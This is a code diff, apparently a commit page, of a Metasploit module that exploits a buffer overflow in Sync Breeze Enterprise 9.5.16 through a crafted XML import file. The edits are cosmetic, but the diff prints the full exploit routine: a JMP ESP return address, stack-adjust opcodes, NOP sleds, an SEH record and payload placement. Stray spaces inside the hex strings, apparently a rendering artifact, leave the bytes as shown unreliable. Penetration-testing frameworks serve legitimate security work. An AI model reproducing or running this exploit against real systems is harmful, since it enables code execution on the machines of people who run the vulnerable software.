@@ -12,14 +12,14 @@ class MetasploitModule < Msf::Exploit::Remote
1212 def initialize ( info = { } )
1313 super ( update_info ( info ,
1414 'Name' => 'Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow' ,
15- 'Description' => %q{
15+ 'Description' => %q(
1616 This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16
1717 by using the import command option to import a specially crafted xml file.
18- } ,
18+ ) ,
1919 'License' => MSF_LICENSE ,
2020 'Author' =>
2121 [
22- 'Daniel Teixeira' ,
22+ 'Daniel Teixeira'
2323 ] ,
2424 'References' =>
2525 [
@@ -39,7 +39,7 @@ def initialize(info = {})
3939 } ,
4040 'Targets' =>
4141 [
42- [ 'Windows Universal' , { 'Ret' => 0x10015FFE } ] ,
42+ [ 'Windows Universal' , { 'Ret' => 0x10015FFE } ]
4343 ] ,
4444 'Privileged' => false ,
4545 'DisclosureDate' => 'Mar 29 2017' ,
@@ -49,28 +49,26 @@ def initialize(info = {})
4949 [
5050 OptString . new ( 'FILENAME' , [ true , 'The file name.' , 'msf.xml' ] )
5151 ] )
52-
5352 end
5453
5554 def exploit
56- jmpesp = "\x7A \xB7 \x1B \x65 " #JMP ESP QtGui4.dll
57- esp = "\x8D \x44 \x24 \x4C " #LEA EAX, [ESP+76]
58- jmp = "\xFF \xE0 " #JMP ESP
55+ jmpesp = "\x7A \xB7 \x1B \x65 " # JMP ESP QtGui4.dll
56+ esp = "\x8D \x44 \x24 \x4C " # LEA EAX, [ESP+76]
57+ jmp = "\xFF \xE0 " # JMP ESP
5958
6059 buffer = "<?xml version=\" 1.0\" encoding=\" UTF-8\" ?>\n <classify\n name=\' "
61- buffer << "\x90 " * 1536
60+ buffer << "\x90 " * 1536
6261 buffer << jmpesp
63- buffer << "\x90 " * 18
62+ buffer << "\x90 " * 18
6463 buffer << esp
6564 buffer << jmp
66- buffer << "\x90 " * 68
65+ buffer << "\x90 " * 68
6766 buffer << generate_seh_record ( target . ret )
68- buffer << "\x90 " * 10
67+ buffer << "\x90 " * 10
6968 buffer << payload . encoded
70- buffer << "\x90 " * 5000
69+ buffer << "\x90 " * 5000
7170 buffer << "\n </classify>"
7271
73-
7472 print_status ( "Creating '#{ datastore [ 'FILENAME' ] } )
7573 file_create ( buffer )
7674 end
0 commit comments